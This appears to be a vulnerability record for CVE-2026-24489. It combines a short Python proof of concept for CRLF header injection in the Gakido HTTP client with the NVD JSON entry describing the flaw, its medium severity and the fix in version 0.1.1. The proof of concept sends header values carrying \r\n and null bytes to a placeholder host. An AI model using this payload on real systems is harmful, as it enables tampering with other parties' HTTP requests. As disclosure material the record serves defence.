CVE-2026-24489

import gakido # PoC for CVE-2026-24489 - HTTP Header Injection in Gakido # Vulnerable versions: < 0.1.1 client = gakido.Client() # Inject arbitrary HTTP headers via CRLF injection malicious_headers = { 'User-Agent': 'Mozilla/5.0\r\nX-Injected-Header: malicious-value\r\nX-Injected-Header2: another-value', 'X-Custom-Header': 'value1\x00\x0a\x0dmalicious' } try: # This will inject arbitrary headers in vulnerable versions response = client.get('http://target.example.com/', headers=malicious_headers) print(f"Status: {response.status_code}") except Exception as e: print(f"Error: {e}") # Fixed version check try: from gakido.utils import _sanitize_header # Sanitized headers should strip CRLF characters sanitized = _sanitize_header(malicious_headers['User-Agent']) print(f"Sanitized header: {sanitized}") except ImportError: print("Vulnerable version - _sanitize_header not available")

{"cve": {"id": "CVE-2026-24489", "sourceIdentifier": "[email protected]", "published": "2026-01-27T01:16:02.453", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gakido is a Python HTTP client focused on browser impersonation and anti-bot evasion. A vulnerability was discovered in Gakido prior to version 0.1.1 that allowed HTTP header injection through CRLF (Carriage Return Line Feed) sequences in user-supplied header values and names. When making HTTP requests with user-controlled header values containing `\\r\\n` (CRLF), `\\n` (LF), or `\\x00` (null byte) characters, an attacker could inject arbitrary HTTP headers into the request. The fix in version 0.1.1 adds a `_sanitize_header()` function that strips `\\r`, `\\n`, and `\\x00` characters from both header names and values before they are included in HTTP requests."}, {"lang": "es", "value": "Gakido es un cliente HTTP de Python centrado en la suplantación de navegadores y la evasión de bots. Se descubrió una vulnerabilidad en Gakido anterior a la versión 0.1.1 que permitía la inyección de encabezados HTTP a través de secuencias CRLF (retorno de carro y salto de línea) en los valores y nombres de los encabezados proporcionados por el usuario. Al realizar solicitudes HTTP con valores de encabezado controlados por el usuario que contienen caracteres `\\r\\n` (CRLF), `\\n` (LF) o `\\x00` (byte nulo), un atacante podía inyectar encabezados HTTP arbitrarios en la solicitud. La corrección en la versión 0.1.1 añade una función `_sanitize_header()` que elimina los caracteres `\\r`, `\\n` y `\\x00` tanto de los nombres como de los valores de los encabezados antes de que se incluyan en las solicitudes HTTP."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-93"}, {"lang": "en", "value": "CWE-113"}]}], "references": [{"url": "https://github.com/HappyHackingSpace/gakido/commit/369c67e67c63da510c8a9ab021e54a92ccf1f788", "source": "[email protected]"}, {"url": "https://github.com/HappyHackingSpace/gakido/releases/tag/v0.1.1-1bc6019", "source": "[email protected]"}, {"url": "https://github.com/HappyHackingSpace/gakido/security/advisories/GHSA-gcgx-chcp-hxp9", "source": "[email protected]"}]}}